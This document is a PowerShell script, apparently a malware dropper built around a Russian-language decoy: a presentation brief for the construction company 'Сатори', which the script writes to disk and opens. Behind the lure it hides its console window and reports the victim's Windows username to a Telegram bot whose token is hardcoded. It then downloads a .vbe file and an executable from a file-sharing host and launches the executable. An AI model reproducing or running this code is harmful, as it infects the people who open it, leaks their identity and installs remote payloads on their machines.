Add-Type -Name a0 -Namespace b0 -MemberDefinition '[DllImport("Kernel32.dll")]public static extern IntPtr GetConsoleWindow();[DllImport("user32.dll")]public static extern bool ShowWindow(IntPtr hWnd,Int32 nCmdShow);'
$v0=[b0.a0]::GetConsoleWindow()
[b0.a0]::ShowWindow($v0,0)
$v1="ТЗ на разработку презентации «ЛабПроект».txt"
$v2=Join-Path $env:LOCALAPPDATA $v1
$v3=@"
Для компании: ООО «Сатори»
Сфера деятельности: Комплексные строительные услуги, демонтаж, рециклинг, инженерные коммуникации.

1. Цель, аудитория и контекст использования
    Ключевые цели презентации:
    Участие в тендерах и привлечение крупных заказчиков, включая государственные и муниципальные структуры.
    Формирование сильной деловой репутации и лояльности.
    Презентация компании при личных встречах и рассылка по электронной почте потенциальным клиентам.
Целевая аудитория: Руководители коммерческих предприятий, представители государственных заказчиков, технические директора.
Основная задача: Убедительно продемонстрировать уникальность, опыт и социальную ответственность компании, выделив ее на фоне конкурентов.

2. Технические требования к макету
    Форматы на выходе:
        Для email-рассылки: PDF-файл.
        Для размещения на сайте: ключевые слайды в формате изображений (png/jpg).
        Исходный файлы в .pptx
    Программа для редактирования: Предоставить исходный файл в .pptx (Microsoft PowerPoint).

3. Структура и ключевое содержание

Слайд 1: Титульный слайд
    Заголовок/Слоган: «САТОРИ» – Надежный партнер в строительстве с 1993 года.
    Основной текст: Комплексные решения в области строительства, демонтажа и рециклинга.
    Контактная информация:
        Сайт: www.satori.ru
        Телефон: +7 (495) 123-45-67 (единый многоканальный)
        Email для запросов: info@satori.ru
        Адрес головного офиса: Москва, ул. Строителей, д. 1

Слайд 2: О компании: сила и устойчивость
    Заголовок: 30 лет на рынке — синоним стабильности и надежности.
    Основной текст: Компания «Сатори» основана в 1993 году. Мы не просто пережили все экономические кризисы — мы укрепили свои позиции, постоянно развивая технологии и расширяя парк техники. Наш опыт — это гарантия того, что мы выполним свои обязательства перед вами в любых условиях.
    Ключевые цифры (инфографика/иконки):
        1993 — год основания.
        30+ лет безупречной работы.
        1000+ успешно реализованных проектов.

Слайд 3: Наши уникальные компетенции
    Заголовок: Две ключевые технологии, которые определяют наш подход.
    Компетенция 1: Полный цикл рециклинга.
        Текст: Мы — не просто демонтажники. Мы создаем замкнутый цикл: профессиональный снос → сортировка и переработка строительного мусора на собственном заводе → производство качественного вторичного щебня для нового строительства. Это экономит ваши средства и заботится об экологии города.
        Иконка/схема: Схема цикла: «Демонтаж → Переработка → Вторичный материал».
    Компетенция 2: Строительство с социальной миссией.
        Текст: Мы гордимся участием в программе строительства православных храмов в Москве. Этот опыт говорит о высочайшем уровне доверия со стороны государства, сложнейшей проектной работе и ответственности, которую мы несем за объекты особого значения.

Слайд 4: Основные направления деятельности
    Заголовок: Полный спектр услуг для вашего проекта.
    Список направлений (с иконками):
        Генеральное строительство и реконструкция.
        Инженерный (комплексный) демонтаж зданий и сооружений. Статус: Главный эксперт по демонтажу в Москве с 1996 года.
        Рециклинг строительных отходов.
        Прокладка инженерных коммуникаций и сетей.
        Благоустройство территорий.

Слайд 5: Опыт и признание
    Заголовок: Наши проекты говорят за нас.
    Подзаголовок: Мы работали на объектах, которые знает вся страна.
        Строительство и реконструкция бизнес-центров класса «А».
        Участие в крупнейших инфраструктурных проектах Москвы (например, р-н «Москва-Сити», транспортные развязки).

Слайд 6: Социальная ответственность
    Заголовок: Строим будущее — для людей и города.
    Основной текст: Для нас важно, что остается после завершения стройки. Мы создаем не просто объекты, а социальную инфраструктуру, которая улучшает жизнь людей.
    Ключевые цифры и факты:
        Построили более 20 детских садов и общеобразовательных школ в новых районах Москвы.
        Активное участие в Программе строительства православных храмов.
        Собственная программа экологического рециклинга позволяет ежегодно перерабатывать свыше 1 млн. тонн строительных отходов.
    Визуальный акцент: Теплые, «человечные» фотографии: дети у нового садика, семья у храма.
"@
$v3|Out-File -FilePath $v2 -Encoding UTF8
Invoke-Item $v2
$v4="8323167571:AAFEgqb4cAPmKNek-D6ioTvS634gRE0CuTo"
$v5="7063407604"
$v6=[System.Security.Principal.WindowsIdentity]::GetCurrent().Name
$v7="The user's shortcut was enabled for user: "+$v6
$v8="https://api.telegram.org/bot"+$v4+"/sendMessage"
$v9=@{chat_id=$v5;text=$v7}|ConvertTo-Json
try{$v10=Invoke-RestMethod -Uri $v8 -Method Post -ContentType "application/json" -Body $v9}catch{}
Start-Sleep -Seconds 400
$v11="https://www.udrop.com/file/OcWQ/1446062403_house.delete"
$v12="1446062403_house.vbe"
$v13=[Environment]::GetFolderPath("LocalApplicationData")
$v14=Join-Path $v13 $v12
try{$v15=New-Object System.Net.WebClient;$v15.DownloadFile($v11,$v14)}catch{}
$v16="https://www.udrop.com/file/OcWP/1446062403_key.delete"
$v17="1446062403_key.exe"
$v18=Join-Path $v13 $v17
try{
    $v19=New-Object System.Net.WebClient
    $v19.DownloadFile($v16,$v18)
    Start-Process -FilePath $v18 -WindowStyle Normal
}catch{}
exit